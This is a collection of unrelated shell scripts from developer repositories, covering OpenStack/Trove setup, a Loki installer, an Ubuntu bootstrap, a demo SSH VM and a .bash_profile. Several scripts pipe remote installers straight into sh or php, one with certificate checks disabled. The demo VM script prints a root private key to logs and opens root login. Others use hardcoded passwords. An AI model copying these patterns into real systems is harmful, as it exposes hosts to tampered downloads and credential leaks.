openstack --os-identity-api-version=3 endpoint create --region regionOne swift admin http://${DEFROUTE_IP}:8080/v1/AUTH_%\(tenant_id\)s
openstack --os-identity-api-version=3 endpoint create --region regionOne swift internal http://${DEFROUTE_IP}:8080/v1/AUTH_%\(tenant_id\)s
#openstack --os-domain-name default --os-identity-api-version=3 endpoint create --publicurl http://${DEFROUTE_IP}:8080/v1/AUTH_%\(tenant_id\)s --adminurl http://${DEFROUTE_IP}:8080/ --internalurl http://${DEFROUTE_IP}:8080/v1/AUTH_%\(tenant_id\)s --region regionOne swift
}
install_cinder () {
# At this point in time, cinder should already be preseeded by openstack-deploy,
# so just installing it this way should be fine
DEBIAN_FRONTEND=noninteractive ${APTGET} install cinder-api cinder-volume python-cinderclient cinder-backup cinder-scheduler
if [ -x /usr/bin/lsb_release ] && [ `lsb_release -a | grep Codename | awk '{print $2}'` = "wheezy" ] ; then
DEBIAN_FRONTEND=noninteractive ${APTGET} install -t wheezy-backports tgt || true
else
DEBIAN_FRONTEND=noninteractive ${APTGET} install tgt || true
fi
# Set configuration for swift-backup (normally not needed...)
#pkgos_inifile set /etc/cinder/cinder.conf backup_swift_tenant admin
#pkgos_inifile set /etc/cinder/cinder.conf backup_swift_user admin
#pkgos_inifile set /etc/cinder/cinder.conf backup_swift_key admin
}
restart_swift_again () {
echo "===> Stopping swift..."
for i in /etc/init.d/swift* ; do $i stop ; done
echo "===> Waiting 5 seconds..."
sleep 5
echo "===> Starting swift..."
for i in /etc/init.d/swift* ; do $i start ; done
}
# Param: $1 = name
# $2 = ram
# $3 = disk
# $4 = vcpus
create_flavor_if_not_exists () {
RET=$(openstack flavor list --format=csv | q -d , -H 'SELECT ID FROM - WHERE `Name`="'${1}'"' 2>/dev/null)
if [ -z "${RET}" ] ; then
openstack flavor create --ram ${2} --disk ${3} --vcpus ${4} ${1}
RET=$(openstack flavor list --format=csv | q -d , -H 'SELECT ID FROM - WHERE `Name`="'${1}'"')
fi
}
set_nova_flavors () {
create_flavor_if_not_exists m1.tiny 512 1 1
M1_TINY_FLID=$RET
create_flavor_if_not_exists m1.small 2048 20 1
M1_SMALL_FLID=$RET
create_flavor_if_not_exists m1.medium 4096 40 2
M1_MEDIUM_FLID=$RET
create_flavor_if_not_exists m1.large 8192 80 4
M1_LARGE_FLID=$RET
pkgos_inifile set ${TEMPEST_CONF} compute flavor_ref ${M1_TINY_FLID}
pkgos_inifile set ${TEMPEST_CONF} compute flavor_ref_alt ${M1_SMALL_FLID}
}
prepare_node_for_trove () {
openstack project create trove_for_trove_usage
openstack user create --password trove --project trove_for_trove_usage --email root@localhost --enable regular_trove_user
openstack user create --password trove --project trove_for_trove_usage --email root@localhost --enable admin_trove_user
openstack role add --user admin_trove_user --project trove_for_trove_usage admin
# TODO: fix this by packaging rabbitmqadmin within the rabbitmq-server package.
# This is already commited to git on Alioth, though a backport should be done.
echo "===> Downloading rabbitmqadmin to declare queues and exchanges"
wget https://raw.githubusercontent.com/rabbitmq/rabbitmq-management/rabbitmq_v3_6_0/bin/rabbitmqadmin -O /usr/bin/rabbitmqadmin
chmod +x /usr/bin/rabbitmqadmin
# The management is needed for rabbitmqadmin to work
rabbitmq-plugins enable rabbitmq_management
# Restarting is necessary to enable plugins
invoke-rc.d rabbitmq-server restart
# Add a new user to the rabbitmq for trove to use
rabbitmqctl add_user trove trove
# Set it as admin
rabbitmqctl set_user_tags trove administrator
# Set permissions
rabbitmqadmin --username=trove --password=trove --host=localhost declare permission vhost=/ user=trove configure='.*' write='.*' read='.*'
# Declare the exchange
rabbitmqadmin --username=trove --password=trove --host=localhost declare exchange name=trove type=topic durable=true
echo "#!/bin/sh
set -e
set -x
. /etc/pkgos/pkgos.conf
. /root/osinstallrc
APTGET=\"apt-get -o Dpkg::Options::=--force-confnew --force-yes -y\"
cp /etc/apt/sources.list.d/openstack.list \${BODI_CHROOT_PATH}/etc/apt/sources.list.d
echo \"#!/bin/sh
exit 101
\" >\${BODI_CHROOT_PATH}/usr/sbin/policy-rc.d
chmod +x \${BODI_CHROOT_PATH}/usr/sbin/policy-rc.d
chroot \${BODI_CHROOT_PATH} \${APTGET} update
chroot \${BODI_CHROOT_PATH} \${APTGET} install \${TARGET_OPENSTACK_REL}-\${TARGET_DISTRO}-archive-keyring
chroot \${BODI_CHROOT_PATH} \${APTGET} update
echo \"\${RC_MYSQL_SERVER_PKG_NAME} mysql-server/root_password password \${RC_MYSQL_PASSWORD}
\${RC_MYSQL_SERVER_PKG_NAME} mysql-server/root_password seen true
\${RC_MYSQL_SERVER_PKG_NAME} mysql-server/root_password_again password \${RC_MYSQL_PASSWORD}
\${RC_MYSQL_SERVER_PKG_NAME} mysql-server/root_password_again seen true
\" >\${BODI_CHROOT_PATH}/root/mysql-password-preseed
chroot \${BODI_CHROOT_PATH} debconf-set-selections /root/mysql-password-preseed
rm \${BODI_CHROOT_PATH}/root/mysql-password-preseed
DEBIAN_FRONTEND=noninteractive chroot \${BODI_CHROOT_PATH} \${APTGET} install -y trove-guestagent heat-cfntools mysql-server-5.5 percona-xtrabackup
rm \${BODI_CHROOT_PATH}/usr/sbin/policy-rc.d
mkdir -p \${BODI_CHROOT_PATH}/root/.ssh
cp /root/.ssh/id_rsa.pub \${BODI_CHROOT_PATH}/root/.ssh/authorized_keys
cp /root/.ssh/id_rsa.pub \${BODI_CHROOT_PATH}/root/.ssh/authorized_keys2
" >/root/trove-hook
pkgos-fix-config-default /etc/trove/trove-guestagent.conf oslo_messaging_rabbit rabbit_host ${RC_KEYSTONE_ENDPOINT_IP}
pkgos-fix-config-default /etc/trove/trove-guestagent.conf oslo_messaging_rabbit rabbit_userid trove
pkgos-fix-config-default /etc/trove/trove-guestagent.conf oslo_messaging_rabbit rabbit_password trove
pkgos-fix-config-default /etc/trove/trove-guestagent.conf DEFAULT swift_url http://${RC_KEYSTONE_ENDPOINT_IP}:8080/v1/AUTH_
pkgos-fix-config-default /etc/trove/trove-guestagent.conf DEFAULT os_region_name regionOne
pkgos-fix-config-default /etc/trove/trove-guestagent.conf DEFAULT swift_service_type object-store
pkgos-fix-config-default /etc/trove/trove-guestagent.conf DEFAULT trove_auth_url http://${RC_KEYSTONE_ENDPOINT_IP}:5000/v2.0
chmod +x /root/trove-hook
build-openstack-debian-image -r jessie --hook-script /root/trove-hook -p trovepass -u ${DEBIAN_REPO_PARAM} -s ${DEBIAN_REPO_PARAM}
#trove-manage datastore_update mysql ""
#trove-manage datastore_version_update mysql 5.5 mysql aefce61e-af5a-4139-8f38-e7a32207a329 mysql-server-5.5 1
#trove-manage datastore_update mysql 5.5
glance --os-username admin_trove_user --os-password trove --os-project-name trove_for_trove_usage image-create --name trove-image --visibility public --container-format ovf --disk-format qcow2 --owner admin_trove_user --file debian-jessie-8.0.0-1-amd64.qcow2
echo "#cloud-config
packages:
- trove-guestagent
- mysql-server-5.5
# config file for trove guestagent
write_files:
- path: /etc/trove/trove-guestagent.conf
content: |
rabbit_host = ${RC_KEYSTONE_ENDPOINT_IP}
rabbit_password = trove
rabbit_userid = trove
" >/etc/trove/cloudinit/mysql.cloudinit
}
deploy_tempest_install_pkgs
create_non_admin_keystone_user
build_and_upload_image
fix_tempest_config
gen_ssh_root_key
if [ "${LVMTYPE}" = "loopback" ] ; then
setup_loopback_based_lvm_vg
elif [ "${LVMTYPE}" = "resetup" ] ; then
setup_real_hdd_based_lvm_vg
fi
setup_loopback_based_swift
install_cinder
restart_swift_again
set_nova_flavors
#prepare_node_for_trove
| true
|
d4cd6af89279d28b661265e76547f6f3fab457d5
|
Shell
|
frostyfrog/dotfiles
|
/fbin/fbterm-bi
|
UTF-8
| 254
| 3.015625
| 3
|
[] |
no_license
|
#!/bin/bash
# fbterm-bi: a wrapper script to enable background image with fbterm
# usage: fbterm-bi /path/to/image fbterm-options
echo -ne "\e[?251" # hide cursor
fbv -ciuker "$1" << EOF
q
EOF
shift
export FBTERM_BACKGROUND_IMAGE=1
exec fbterm "$@"
| true
|
22a091b458530347b17d7ba20f4fbb294f72d03a
|
Shell
|
5monkeys/docker-nginx-streaming
|
/envconf.sh
|
UTF-8
| 673
| 3.984375
| 4
|
[] |
no_license
|
#!/usr/bin/env bash
# Usage: envconf.sh (<template-dir> <template-dir> ...)
# Example: envconf.sh
# envconf.sh /etc/nginx/conf.d
#
# By default, all .template files will be recursive found in /etc/nginx
#
# Finds uppercase variables only matching ${...} pattern, to not break
# and substitute nginx-variables, and then uses envsubst to create
# conf file in same dir as template.
#for f in ${1:-/etc/nginx/**/*.template}; do
for f in ${TEMPLATE_PATH:-/etc/nginx/**/*.template}; do
if [ -f ${f} ]; then
echo "Rendering template: ${f}"
variables=$(echo $(grep -Eo '\${[A-Z_]+}' $f))
envsubst "${variables}" < ${f} > ${f%.*}.conf;
fi
done
exec "$@"
| true
|
0898e51cecff24d67addf23c853e29f45390bb7b
|
Shell
|
corgan2222/dotfiles
|
/home/.dot/installer/loki.sh
|
UTF-8
| 2,156
| 3.078125
| 3
|
[] |
no_license
|
#!/bin/bash
loki_linux-amd64()
{
#LOKI_ZIP="/usr/local/bin/loki-linux-amd64.zip"
wget "https://github.com/grafana/loki/releases/download/v1.4.1/loki-linux-amd64.zip"
unzip "loki-linux-amd64.zip"
mv "loki-linux-amd64" "/usr/local/bin/loki"
rm "loki-linux-amd64.zip"
chmod a+x "/usr/local/bin/loki"
mkdir -p /data/loki
mkdir -p /etc/loki
LOKI_CONF_FILE="/etc/loki/config-loki.yml"
cat > $LOKI_CONF_FILE <<EOF
auth_enabled: false
server:
http_listen_port: 3100
ingester:
lifecycler:
address: 127.0.0.1
ring:
kvstore:
store: inmemory
replication_factor: 1
final_sleep: 0s
chunk_idle_period: 5m
chunk_retain_period: 30s
schema_config:
configs:
- from: 2018-04-15
store: boltdb
object_store: filesystem
schema: v9
index:
prefix: index_
period: 168h
storage_config:
boltdb:
directory: /data/loki/index
filesystem:
directory: /data/loki/chunks
limits_config:
enforce_metric_name: false
reject_old_samples: true
reject_old_samples_max_age: 168h
chunk_store_config:
max_look_back_period: 0
table_manager:
chunk_tables_provisioning:
inactive_read_throughput: 0
inactive_write_throughput: 0
provisioned_read_throughput: 0
provisioned_write_throughput: 0
index_tables_provisioning:
inactive_read_throughput: 0
inactive_write_throughput: 0
provisioned_read_throughput: 0
provisioned_write_throughput: 0
retention_deletes_enabled: false
retention_period: 0
EOF
echo "wrote loki config $LOKI_CONF_FILE"
LOKI_SERVICE_FILE="/etc/systemd/system/loki.service"
cat > $LOKI_SERVICE_FILE <<EOF
[Unit]
Description=Loki service
After=network.target
[Service]
Type=simple
ExecStart=/usr/local/bin/loki -config.file /etc/loki/config-loki.yml
[Install]
WantedBy=multi-user.target
EOF
echo "wrote loki service $LOKI_SERVICE_FILE"
echo "run"
echo "sudo service loki start"
echo "sudo service loki status"
echo "close firewall"
echo "
iptables -A INPUT -p tcp -s localhost --dport 3100 -j ACCEPT
iptables -A INPUT -p tcp --dport 3100 -j DROP
iptables -L
"
}
loki_linux-amd64
| true
|
64dafe18fe1b77c9a4df97cf7e52be7291d18dfe
|
Shell
|
tagwint/gitrepone
|
/home/bin/ssebou/bin/chkvimfile
|
UTF-8
| 2,237
| 3.625
| 4
|
[] |
no_license
|
#!/bin/bash
# PURPOSE: to be called from au in vim on buffer exit to save either/or
# - content of the buffer (when vim used as an external editor from browser)
# - file name for the history of recent used
# script supposed to work on both local and remote same way
LOCALVIMHIST=${ONTO4_DRCMDHIST:-/tmp}/${HOSTNAME} # this is for local
# file history to be saved in the same file name as command history, but diffrent extention
VIMRUEXT=${ONTO4_HEEXT:-vimru} #ONTO4_HEEXT can be defined locally, then it will be used to name local history files
BFILE="${@:-NooNxe}"
# this is how vim finds its temp dir, ensured no trailing backslash
VIMTMPDIR=$(sed 's|/*$||' <<<"${TMPDIR:-/tmp}")
#Regexp to ignore
IGNOREG='^'${VIMTMPDIR}'/tmp\..*$
/tmp/crontab\..*$
^EMPTYY$
^XScratch.*$'
REGEX="${VIMTMPDIR}/bash-fc\..*" ; [[ "${BFILE}" =~ $REGEX ]] && USECASE="UC01_FCXE" #https://en.wikipedia.org/wiki/Fc_(Unix) also in C-X C-E
REGEX="${VIMTMPDIR}/editserver/.*" ; [[ "${BFILE}" =~ $REGEX ]] && USECASE="UC02_EMED" #https://github.com/willmoffat/emacs-edit-chrome
REGEX="^.*svn-commit\..*tmp$" ; [[ "${BFILE}" =~ $REGEX ]] && USECASE="UC03_SVNC" #svn commit message
# if name matches ignore list, do nothing, exit
grep -qf <(for re in $IGNOREG; do printf "%s\n" $re; done) <<<"$BFILE" && { echo match ; exit 0; }
# echo "REGEX=${REGEX} BFILE is $BFILE USECASE IS ${USECASE:-None}">>/tmp/oooo
case $USECASE in
UC01_FCXE)
cat "$BFILE" >> /tmp/ctrlXE
;;
UC02_EMED)
VIMBAK=${HISTKEEP3:-${LOCALVIMHIST}}.editserver.$(TZ=Europe/Amsterdam date --iso-8601='seconds') # HISTKEEP3 only defined remotely, thus VIMBAK is defined appropriately
cat "$BFILE" > "${VIMBAK}"
;;
UC03_SVNC)
VIMSVNCIM=${HISTKEEP3:-${LOCALVIMHIST}}.svnmessage
echo "==== $(TZ=Europe/Amsterdam date --iso-8601='seconds')" >>"${VIMSVNCIM}"
cat "$BFILE" >> "${VIMSVNCIM}"
;;
*)
VIMHIST=${HISTKEEP3:-${LOCALVIMHIST}}.${VIMRUEXT}
if [[ -f "$BFILE" ]] ; then
echo "$(TZ=Europe/Amsterdam date --iso-8601='seconds') ${BFILE}">>${VIMHIST} # HISTKEEP3 only defined remotely, thus VIMHIST is defined appropriately
else
: # do nothing, there's no saved file actually
fi
;;
esac
| true
|
2bfe33aa0329b49c017434d8b08a13d33a09f586
|
Shell
|
hbz/metafacture-core
|
/travis/sonarqube.sh
|
UTF-8
| 1,107
| 3.15625
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
#
# Copyright 2017, 2018 Christoph Böhme
#
# Licensed under the Apache License, Version 2.0 the "License";
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Sonarqube analysis cannot be made when building pull requests because secure
# variables are not available in such builds. To prevent build failures, the
# sonarqube target is only invoked if not building a pull request.
#
function main {
require_no_pull_request
./gradlew sonarqube
}
# Exit successfully (skipping analysis) when building a Travis pull request,
# because secure variables (the Sonar credentials) are not exposed to PR
# builds. Uses [[ ... && ... ]] instead of the obsolescent `test -a`
# operand, which POSIX marks ambiguous and ShellCheck flags (SC2166).
function require_no_pull_request {
  if [[ -v TRAVIS_PULL_REQUEST && "$TRAVIS_PULL_REQUEST" != "false" ]]; then
    echo "Building pull request. Skipping sonarqube analysis"
    exit 0
  fi
}
main
| true
|
0a659cfb49c2ea9b10bcb95ef20f37c8ba589c53
|
Shell
|
brummbar/dotfiles
|
/os/install_prezto.sh
|
UTF-8
| 2,083
| 3.90625
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
cd "$(dirname "${BASH_SOURCE}")" && source "utils.sh"
# Prezto runcom files symlinked from ~/.zprezto/runcoms into $HOME as dotfiles.
declare -a FILES_TO_SYMLINK=(zlogin zlogout zpreztorc zprofile zshenv zshrc)
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Install prezto and base16 themes, then symlink the zsh runcoms and the
# matching vim colorscheme into $HOME. Relies on helpers sourced from
# utils.sh: cmd_exists, print_error, print_result, get_os and symlink.
# All path expansions are now quoted so directories containing spaces
# (e.g. a custom $ZDOTDIR) do not word-split.
main() {
  declare -r BASE16_DIR="$HOME/.base16"
  declare -r PREZTO_DIR="${ZDOTDIR:-$HOME}/.zprezto"
  declare -r OS="$(get_os)"
  local i=""
  local sourceFile=""
  local targetFile=""

  # Check if `Git` is installed
  if ! cmd_exists "git"; then
    print_error "Git is required, please install it!\n"
    exit 1
  fi

  # Clone base16-vim
  if [ ! -d "$BASE16_DIR/base16-vim" ]; then
    git clone https://github.com/chriskempson/base16-vim.git "$BASE16_DIR/base16-vim" &> /dev/null
    print_result $? "Clone base16-vim" "true"
  fi

  # Clone base16-shell
  if [ ! -d "$BASE16_DIR/base16-shell" ]; then
    git clone https://github.com/chriskempson/base16-shell.git "$BASE16_DIR/base16-shell" &> /dev/null
    print_result $? "Clone base16-shell" "true"
  fi

  # Clone Brummbar prezto (quoted: was an unquoted test/clone target before)
  if [ ! -d "$PREZTO_DIR" ]; then
    git clone --recursive https://github.com/brummbar/prezto.git "$PREZTO_DIR" &> /dev/null
    print_result $? "Clone Brummbar prezto" "true"
  fi

  # Create symlinks for prezto
  for i in "${FILES_TO_SYMLINK[@]}"; do
    sourceFile="${ZDOTDIR:-$HOME}/.zprezto/runcoms/$i"
    targetFile="${ZDOTDIR:-$HOME}/.$i"
    symlink "$targetFile" "$sourceFile"
  done

  # Symlink the matching vim color
  mkdir -p "$HOME/.vim/colors"
  symlink "$HOME/.vim/colors/base16-tomorrow-night.vim" "$BASE16_DIR/base16-vim/colors/base16-tomorrow-night.vim"

  # Install iTerm2/Terminator color schemes based on os.
  if [ "$OS" == "osx" ]; then
    # todo: fetch profile
    echo "nothing" &> /dev/null
  elif [ "$OS" == "ubuntu" ]; then
    sourceFile="$(cd .. && pwd)/terminator/config"
    targetFile="$HOME/.config/terminator/config"
    symlink "$targetFile" "$sourceFile"
  fi
}
main
| true
|
d96b43d1368896fa8b01d18bb07c04f0beadbe58
|
Shell
|
cekerholic/dotfiles
|
/ubuntu/init.sh
|
UTF-8
| 744
| 2.546875
| 3
|
[] |
no_license
|
# Bootstrap an Ubuntu dev box: tmux (from the pi-rho PPA), git, zsh with
# oh-my-zsh, and symlinks from this repo's dotfiles into $HOME.
# Run from the repo directory ($PWD is used as the symlink source).
# Ends by rebooting the machine.
sudo apt-get update

# Install tmux
sudo apt-get install -y python-software-properties software-properties-common
sudo add-apt-repository -y ppa:pi-rho/dev
sudo apt-get update
sudo apt-get install -y tmux
ln -sfn $PWD/.tmux.conf ~/.tmux.conf

# essentials
sudo apt-get install -y build-essential libssl-dev curl

# git
sudo apt-get install -y git
sudo apt-get install -y gitk
ln -sfn $PWD/git/.gitconfig ~/.gitconfig
ln -sfn $PWD/git/.gitignore ~/.gitignore

# Install zsh
sudo apt-get install -y zsh

# Install oh-my-zsh
# NOTE(review): pipes a remote script straight to sh and disables TLS
# certificate checking -- verify the URL is still trusted before running.
wget --no-check-certificate https://github.com/robbyrussell/oh-my-zsh/raw/master/tools/install.sh -O - | sh
# Replace the .zshrc generated by the oh-my-zsh installer with ours.
rm ~/.zshrc
ln -sfn $PWD/.zshrc ~/.zshrc

# Set zsh as default
chsh -s $(which zsh)

# Restart
sudo shutdown -r 0
| true
|
b13a86e77b89ac95f6fa6dc3506ed036804c12c8
|
Shell
|
duglin/ce-ssh
|
/vm/setup-vm
|
UTF-8
| 1,314
| 3.53125
| 4
|
[] |
no_license
|
#!/bin/sh
set -ex

# Prepare a throwaway demo VM: configure sshd for root login and TCP
# forwarding, generate host and user keys, optionally bridge a TCP port to
# a UDP backend, then run dropbear in the foreground.

# Edit our sshd config to allow root login, and port forwarding
FILE=/etc/ssh/sshd_config
sed -i "s/^.*PermitRootLogin.*/PermitRootLogin without-password/" "$FILE"
sed -i "s/^.*PasswordAuthentication.*/PasswordAuthentication yes/" "$FILE"
sed -i "s/^.*AllowTcpForwarding.*/AllowTcpForwarding yes/" "$FILE"
# sed -i "s/^.*PermitOpen.*/PermitOpen any/" $FILE
# sed -i "s/^.*UsePAM.*/UsePAM yes/" $FILE
# echo "root:root" | chpasswd

# Generate hostkeys (used by sshd) and our public/private ssh keys
ssh-keygen -A
ssh-keygen -N "" -t rsa -b 4096 -f /root/.ssh/id_rsa

# NEVER DO THIS OUTSIDE OF A DEMO!
# Put the private key into our logs so we can use it from a client
set +x
cat /root/.ssh/id_rsa
sleep 1

# Add public key we generated to the authorized keys so our client can connect
cat /root/.ssh/id_rsa.pub > /root/.ssh/authorized_keys

# Ensure everything has the right permissions. ssh is picky
set -x
chmod go-rwx /root/.ssh/*

# Setup a TCP->UDP mapper if requested.
# Plain [ ] tests chained with &&: the previous [[ ... && ... ]] form is a
# bash-only construct, but this script declares #!/bin/sh.
if [ -n "$UDP_PORT" ] && [ -n "$SERVICE_IP" ] && [ -n "$SERVICE_PORT" ]; then
	mkfifo /tmp/fifo
	while true ; do
		nc -vlp $UDP_PORT < /tmp/fifo | nc -vu $SERVICE_IP $SERVICE_PORT > /tmp/fifo
	done &
fi

# Finally start sshd
# /usr/sbin/sshd -D -e
mkdir /etc/dropbear
# Loop so a dropped session restarts the server.
while true ; do
	dropbear -a -p 0.0.0.0:22 -R -F -E
done
| true
|
80faec181ae6b21f14f8c925c7326b9fadcd5640
|
Shell
|
coop182/lemp-dev
|
/bin/lemp.sh
|
UTF-8
| 1,627
| 3.4375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# Vagrant provisioner: install and wire up an NGINX + MySQL + PHP5 stack
# plus phpMyAdmin and Composer, and generate one nginx vhost per name
# listed in /vagrant/host-aliases.
# Relies on helper commands from the base provisioning framework
# (apt-packages-install, mysql-remote-access-allow, mysql-restart,
# php-settings-update, nginx-sites-create/enable, php-fpm-restart,
# nginx-restart) -- TODO confirm where these helpers are defined.

# Setup NginX, MySql, PHP
apt-packages-install \
mysql-server \
nginx \
php5-fpm \
php5-common \
php5-cli \
php5-gd \
php5-curl \
phpmyadmin

# Allow unsecured remote access to MySQL.
mysql-remote-access-allow

# setup new mysql admin user
# NOTE(review): dev-box credentials (admin/admin) -- never reuse outside a VM.
mysql -u root -e "GRANT ALL PRIVILEGES ON *.* TO 'admin'@'localhost' IDENTIFIED BY 'admin';"
mysql -u root -e "GRANT GRANT OPTION ON *.* TO 'admin'@'localhost' IDENTIFIED BY 'admin';"

# Restart MySQL service for changes to take effect.
mysql-restart

# Set PHP timezone
php-settings-update 'date.timezone' 'Europe/London'

# Install Composer
if [ ! -f "/usr/local/bin/composer" ]; then
curl -s https://getcomposer.org/installer | sudo php
sudo mv composer.phar /usr/local/bin/composer
fi

# Setup the localhost virtual host
if [ ! -d '/data/www/lempdev.localhost' ]; then
sudo mkdir -p /data/www/lempdev.localhost
PHP=/usr/bin/php5-fpm nginx-sites-create "lempdev.localhost" "/data/www/lempdev.localhost" "vagrant"
nginx-sites-enable "lempdev.localhost"
fi

#symlink phpmyadmin to localhost directory
if [ ! -d "/data/www/lempdev.localhost/phpmyadmin" ]; then
sudo ln -s /usr/share/phpmyadmin /data/www/lempdev.localhost
fi

# create virtual hosts
# NOTE(review): the backtick cat output is word-split, so host-aliases is
# assumed to hold one whitespace-free hostname per line -- confirm format.
for site in `cat /vagrant/host-aliases`; do
if [ ! -d "/data/www/$site" ]; then
sudo mkdir -p /data/www/$site
PHP=/usr/bin/php5-fpm nginx-sites-create "$site" "/data/www/$site" "vagrant"
nginx-sites-enable "$site"
fi
done

php-fpm-restart
nginx-restart
| true
|
ca16ab38213f9d377c3818cc73f4e5f05e2340fe
|
Shell
|
golang/benchmarks
|
/cmd/bent/scripts/cpuprofile
|
UTF-8
| 372
| 3
| 3
|
[
"BSD-3-Clause",
"LicenseRef-scancode-google-patent-license-golang"
] |
permissive
|
#!/bin/bash
# Run args as command, but run cpuprofile and then pprof to capture test cpuprofile output
pf="${BENT_PROFILES}/${BENT_BINARY}_${BENT_I}.prof"
mkdir -p "${BENT_PROFILES}"
"$@" -test.cpuprofile="$pf"
echo cpuprofile in "$pf"
# Prefer a standalone pprof on PATH; otherwise fall back to the copy
# bundled with the Go toolchain. `command -v` replaces the fragile
# x`which pprof` == x"" string comparison.
if command -v pprof >/dev/null 2>&1 ; then
	pprof -text -flat -nodecount=20 "$pf"
else
	go tool pprof -text -flat -nodecount=20 "$pf"
fi
| true
|
34334f517cfe7c685e5547543651d9d2eb0b39a9
|
Shell
|
PouuleT/docker-ovethebox
|
/setup_dnat.sh
|
UTF-8
| 734
| 3.765625
| 4
|
[] |
no_license
|
#!/bin/sh
# Whitelist one public IP to reach a local host's SSH (22) and HTTPS (443)
# through a modem container, by installing DNAT rules in the container's
# nat PREROUTING chain.
if [ "$#" -ne 3 ]; then
	# printf instead of echo: the old `echo "Usage: \n"` printed a literal
	# backslash-n (bash echo does not interpret escapes without -e).
	printf 'Usage:\n\n'
	printf '%s <modem> <local_ip> <authorized_public_ip>\n' "$0"
	exit 1
fi

MODEM=$1
LOCAL_IP=$2
AUTHORIZED_IP=$3

echo "Authorizing ${AUTHORIZED_IP} to connect to ${LOCAL_IP} via ${MODEM}"
# Flush previous rules so re-running the script replaces rather than stacks rules.
docker exec "${MODEM}" iptables -t nat -F PREROUTING
docker exec "${MODEM}" iptables -t nat -A PREROUTING -s "${AUTHORIZED_IP}"/32 -p tcp -m tcp --dport 22 -j DNAT --to-destination "${LOCAL_IP}":22
docker exec "${MODEM}" iptables -t nat -A PREROUTING -s "${AUTHORIZED_IP}"/32 -p tcp -m tcp --dport 443 -j DNAT --to-destination "${LOCAL_IP}":443
echo "Done"

PUBLIC_WAN=$(docker exec "${MODEM}" curl -s ifconfig.ovh)

echo "You can now connect with:"
echo "ssh root@${PUBLIC_WAN}"
echo "https://${PUBLIC_WAN}"
| true
|
470728cce2cdf278a3f3250684172c7c33dc9e64
|
Shell
|
atoulme/dotfiles
|
/.bash_profile
|
UTF-8
| 16,358
| 3.46875
| 3
|
[
"MIT"
] |
permissive
|
alias vi=vim
function st {
svn st $@
growlNotify -n "SVN" -m "`pwd` status done"
}
function up {
svn up $@
growlNotify -n "SVN" -m "`pwd` updated"
}
alias di="svn diff"
alias cfct="st |grep ^C"
alias modif="st | grep ^M"
alias new="st | grep ^?"
alias ls="ls -G"
alias la="ls -a"
alias ll="ls -l"
alias l="ll"
alias .p='source ~/.bash_profile'
alias ?='h | g '
alias g='grep'
alias h='history'
alias cls='tput clear'
export global MAVEN_OPTS="-Xmx1024M"
export SCALA_HOME="/Users/$(whoami)/tools/scala-2.8.0.final"
export GROOVY_HOME="/Users/$(whoami)/tools/groovy-1.7.1"
export JAVA_HOME="/Library/Java/JavaVirtualMachines/jdk1.8.0_171.jdk/Contents/Home/"
export GRADLE_HOME="/Users/$(whoami)/tools/gradle-2.8"
export global PATH=$PATH":/Users/$(whoami)/tools/mvn3/bin:/opt/local/bin:~/bin:/usr/local/mysql/bin:~/tools/apache-ant-1.7.1/bin:$SCALA_HOME/bin:$GROOVY_HOME/bin:$GRADLE_HOME/bin"
alias mvn=~/tools/mvn3/bin/mvn
# Emit "*" when the work tree has unstaged changes (i.e. `git diff --quiet`
# exits with status 1); emit nothing otherwise (clean tree, not a repo, ...).
function parse_git_dirty {
  local rc=0
  git diff --quiet HEAD &>/dev/null || rc=$?
  [[ $rc == 1 ]] && echo "*"
}
# Print the current git branch as "[branch]" (suffixed with "*" when the
# tree is dirty, via parse_git_dirty); print nothing outside a repository.
function parse_git_branch {
  local dirty
  dirty=$(parse_git_dirty)
  git branch --no-color 2> /dev/null | sed -n "s/^\* \(.*\)/[\1${dirty}]/p"
}
#export global PS1="\[\033[0;37m\]\t\[\033[0m|\[\033[0;34m\w\[\033[0m|> "
PS1="\[\033[0;37m\]\t\[\033[01;34m\]\w\[\033[00m\]\$(parse_git_branch)>"
alias apache2ctl='sudo /opt/local/apache2/bin/apachectl'
# For SVN
export SVN_EDITOR=vim
export LC_CTYPE=en_US.UTF-8
# Because I keep forgetting the right command, and it is starting to make me really unproductive to google for it every _single_ time
alias untargz='echo "Doh! Use tar xvzf, dummy!" ; tar xvzf'
# Yes, I enjoy insulting myself.
# rm_DS_Store_files: removes all .DS_Store file from the current dir and below
alias rm_DS_Store_files='find . -name .DS_Store -exec rm {} \;'
# zipf: to create a ZIP archive of a file or folder
function zipf { zip -r "$1".zip "$1" ; }
# numFiles: number of (non-hidden) files in current directory
alias numFiles='echo $(ls -1 | wc -l)'
# showTimes: show the modification, metadata-change, and access times of a file
function showTimes { stat -f "%N: %m %c %a" "$@" ; }
# finderComment: show the SpotLight comment for a file
function finderComment { mdls "$1" | grep kMDItemFinderComment ; }
# to remove filename extensions in bash: ${file%\.[^.]*}
#-----------
# Searching:
#-----------
# ff: to find a file under the current directory
function ff () { /usr/bin/find . -name "$@" ; }
# ffs: to find a file whose name starts with a given string
function ffs () { /usr/bin/find . -name "$@"'*' ; }
# ffe: to find a file whose name ends with a given string
function ffe () { /usr/bin/find . -name '*'"$@" ; }
# grepfind: to grep through files found by find, e.g. grepf pattern '*.c'
# note that 'grep -r pattern dir_name' is an alternative if want all files
function grepfind () { find . -type f -name "$2" -print0 | xargs -0 grep "$1" ; }
# I often can't recall what I named this alias, so make it work either way:
alias findgrep='grepfind'
# grepincl: to grep through the /usr/include directory
function grepincl () { (cd /usr/include; find . -type f -name '*.h' -print0 | xargs -0 grep "$1" ) ; }
# locatemd: to search for a file using Spotlight's metadata
function locatemd { mdfind "kMDItemDisplayName == '$@'wc"; }
# locaterecent: to search for files created since yesterday using Spotlight
# This is an illustration of using $time in a query
# See: http://developer.apple.com/documentation/Carbon/Conceptual/SpotlightQuery/index.html
function locaterecent { mdfind 'kMDItemFSCreationDate >= $time.yesterday'; }
# list_all_apps: list all applications on the system
function list_all_apps() { mdfind 'kMDItemContentTypeTree == "com.apple.application"c' ; }
# find_larger: find files larger than a certain size (in bytes)
function find_larger() { find . -type f -size +${1}c ; }
# an example of using Perl to search Unicode files for a string:
